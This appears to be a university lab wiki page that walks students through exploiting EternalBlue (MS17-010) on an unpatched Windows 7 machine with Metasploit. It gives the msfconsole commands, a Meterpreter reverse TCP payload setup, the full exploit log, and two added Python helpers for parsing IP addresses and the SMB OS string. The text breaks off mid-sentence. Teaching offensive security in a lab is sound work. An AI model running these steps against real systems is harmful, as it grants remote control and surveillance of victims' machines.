Difference between revisions of "EternalBlue Windows 7"

From csn
Revision as of 11:50, 30 September 2021

In this lab we will learn how to use the EternalBlue vulnerability against an unpatched Windows 7 host. This exploit was linked to the NSA but has since been patched on all Windows versions. We will use Metasploit on Kali Linux to make the process a little easier.

  • EternalBlue
  • Linux
  • Security
  • Metasploit

Starting up Metasploit

On the Kali VM, open a terminal and type the following commands:

service postgresql start
msfconsole

Then use the search command to see which modules are available:

search eternalblue

You should see something like this:

Matching Modules
================

   Name                                           Disclosure Date  Rank     Check  Description
   ----                                           ---------------  ----     -----  -----------
   auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection
   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

Getting the IP address of your Windows 7 machine

On the Windows 7 machine, open a command prompt and type:

ipconfig

We are looking for an IP address that looks like 134.115.148.xxx (xxx being the last numbers):

Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::2121:c64f:633e:44de%12
   IPv4 Address. . . . . . . . . . . : 134.115.148.139
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::a68c:dbff:fe6e:ef01%12
                                       134.115.148.1

In this example you can see the IP address is 134.115.148.139.

Setting the target to attack in Metasploit

In Kali Linux we now need to set the host to attack (the Windows machine):

set rhosts 134.115.148.xxx

This will be the IP address you got earlier; it should output:

rhosts => 134.115.148.xxx

We will now set the payload (the software we will infect the Windows 7 machine with); this software will allow us to control the machine remotely:

set payload windows/x64/meterpreter/reverse_tcp

You should get this output:

payload => windows/x64/meterpreter/reverse_tcp

We now need to tell Metasploit the IP address of our Kali Linux machine.

Getting the IP address in Kali Linux

Open a new terminal window and type this command to get the IP address:

ifconfig

We are looking for an IP address that looks like 134.115.148.xxx (xxx being the last numbers):

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 134.115.148.147  netmask 255.255.255.0  broadcast 134.115.148.255
        inet6 fe80::20c:29ff:feee:61f1  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:ee:61:f1  txqueuelen 1000  (Ethernet)
        RX packets 4  bytes 1368 (1.3 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 19  bytes 2528 (2.4 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

In this example you can see the IP address is 134.115.148.147.
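The netmask, broadcast and gateway lines in the two outputs above also contain 134.115.148.x addresses, so it is easy to copy the wrong one into Metasploit. The following Python helper is an added example, not part of this lab page: it pulls the host's own IPv4 address out of either Windows ipconfig or Linux ifconfig output and checks that it lies in the lab subnet. The two sample outputs embedded in it are copied from the steps above.

```python
import re
from ipaddress import ip_address, ip_network
from typing import Optional

# Sample outputs as shown in the lab steps (embedded so the script runs offline).
WIN_IPCONFIG = """Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::2121:c64f:633e:44de%12
   IPv4 Address. . . . . . . . . . . : 134.115.148.139
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::a68c:dbff:fe6e:ef01%12
                                       134.115.148.1
"""

KALI_IFCONFIG = """eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 134.115.148.147  netmask 255.255.255.0  broadcast 134.115.148.255
        inet6 fe80::20c:29ff:feee:61f1  prefixlen 64  scopeid 0x20<link>
"""

# Match only the line that labels the host's own IPv4 address: Windows prints it
# after "IPv4 Address", ifconfig after "inet".  Netmask, broadcast and gateway
# lines also contain dotted quads, so matching any number in the output is wrong.
_ADDR_LINE = re.compile(r"(?:IPv4 Address[ .]*:|\binet)\s+(\d{1,3}(?:\.\d{1,3}){3})")


def host_ipv4(output: str, lab_net: str = "134.115.148.0/24") -> Optional[str]:
    """Return the host's IPv4 address if it is inside the lab subnet, else None."""
    net = ip_network(lab_net)
    for match in _ADDR_LINE.finditer(output):
        try:
            addr = ip_address(match.group(1))
        except ValueError:  # e.g. an octet above 255 slipped past the regex
            continue
        if addr in net:
            return str(addr)
    return None


if __name__ == "__main__":
    print("rhosts (Windows 7 target):", host_ipv4(WIN_IPCONFIG))
    print("lhost  (Kali listener):   ", host_ipv4(KALI_IFCONFIG))
```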

Setting the local IP in Metasploit

In the terminal window on the Kali machine, type:

set lhost 134.115.148.xxx

You should get this output:

lhost => 134.115.148.xxx

Then set the port:

set lport 4321

You should get this output:

lport => 4321

Running the exploit and controlling the Windows 7 machine

We are now going to run the exploit and can then test out things like watching the screen or turning the webcam on remotely.

In the Kali terminal, run the exploit:

run

You should get this output:

[*] Started reverse TCP handler on 134.115.148.xxx:4321
[*] 134.115.148.xxx:445 - Connecting to target for exploitation.
[+] 134.115.148.xxx:445 - Connection established for exploitation.
[+] 134.115.148.xxx:445 - Target OS selected valid for OS indicated by SMB reply
[*] 134.115.148.xxx:445 - CORE raw buffer dump (51 bytes)
[*] 134.115.148.xxx:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 134.115.148.xxx:445 - 0x00000010  30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20  008 R2 Standard
[*] 134.115.148.xxx:445 - 0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac
[*] 134.115.148.xxx:445 - 0x00000030  6b 20 31                                         k 1
[+] 134.115.148.xxx:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 134.115.148.xxx:445 - Trying exploit with 12 Groom Allocations.
[*] 134.115.148.xxx:445 - Sending all but last fragment of exploit packet
[*] 134.115.148.xxx:445 - Starting non-paged pool grooming
[+] 134.115.148.xxx:445 - Sending SMBv2 buffers
[+] 134.115.148.xxx:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 134.115.148.xxx:445 - Sending final SMBv2 buffers.
[*] 134.115.148.xxx:445 - Sending last fragment of exploit packet!
[*] 134.115.148.xxx:445 - Receiving response from exploit packet
[+] 134.115.148.xxx:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 134.115.148.xxx:445 - Sending egg to corrupted connection.
[*] 134.115.148.xxx:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 134.115.148.xxx
[*] Meterpreter session 1 opened (134.115.148.xxx:4321 -> 134.115.148.xxx:49207) at 2019-03-26 11:01:46 -0500
[+] 134.115.148.xxx:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 134.115.148.xxx:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 134.115.148.xxx:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >
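The "CORE raw buffer dump" rows above are the OS string from the target's SMB reply, printed 16 bytes per row. Note that the sample output on this page reports Windows Server 2008 R2 Standard, which shares kernel build 7601 with Windows 7 SP1, so on the lab's Windows 7 host the string will differ. The following Python script is an added example, not part of this lab or of Metasploit: it reassembles the string from the hex columns, checking the row offsets and the declared length, so you can confirm which OS a session actually came from. The dump lines embedded in it are copied from the output above.

```python
import re
from typing import Optional, Tuple

# The dump lines as msfconsole prints them, copied from the output above.
DUMP_LINES = """\
[*] 134.115.148.xxx:445 - CORE raw buffer dump (51 bytes)
[*] 134.115.148.xxx:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 134.115.148.xxx:445 - 0x00000010  30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20  008 R2 Standard
[*] 134.115.148.xxx:445 - 0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac
[*] 134.115.148.xxx:445 - 0x00000030  6b 20 31                                         k 1
"""

_HEADER = re.compile(r"CORE raw buffer dump \((\d+) bytes\)")
# Offset, then at most 16 hex pairs; the cap stops us reading the ASCII column as hex.
_ROW = re.compile(r"0x([0-9a-fA-F]{8})\s+((?:[0-9a-fA-F]{2}(?:\s+|$)){1,16})")


def decode_core_dump(text: str) -> bytes:
    """Rebuild the dumped bytes, checking row offsets and the declared length."""
    declared: Optional[int] = None
    out = bytearray()
    for line in text.splitlines():
        header = _HEADER.search(line)
        if header:
            declared = int(header.group(1))
            continue
        row = _ROW.search(line)
        if not row:
            continue  # not a dump row (e.g. other msfconsole status lines)
        offset = int(row.group(1), 16)
        if offset != len(out):
            raise ValueError(f"row 0x{offset:08x} does not follow the previous row")
        out += bytes.fromhex(row.group(2))  # fromhex ignores the spaces
    if declared is not None and len(out) != declared:
        raise ValueError(f"decoded {len(out)} bytes but header declared {declared}")
    return bytes(out)


def split_os_string(os_str: str) -> Tuple[str, Optional[int]]:
    """'Windows Server 2008 R2 Standard 7601 Service Pack 1' -> (product, build)."""
    m = re.match(r"^(.*)\s+(\d{4,5})\b", os_str)  # greedy: takes the last build number
    return (m.group(1), int(m.group(2))) if m else (os_str, None)


if __name__ == "__main__":
    product, build = split_os_string(decode_core_dump(DUMP_LINES).decode("ascii"))
    print(f"SMB reply identified: {product!r}, kernel build {build}")
```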

We now have control of the machine and you can try out some commands such as: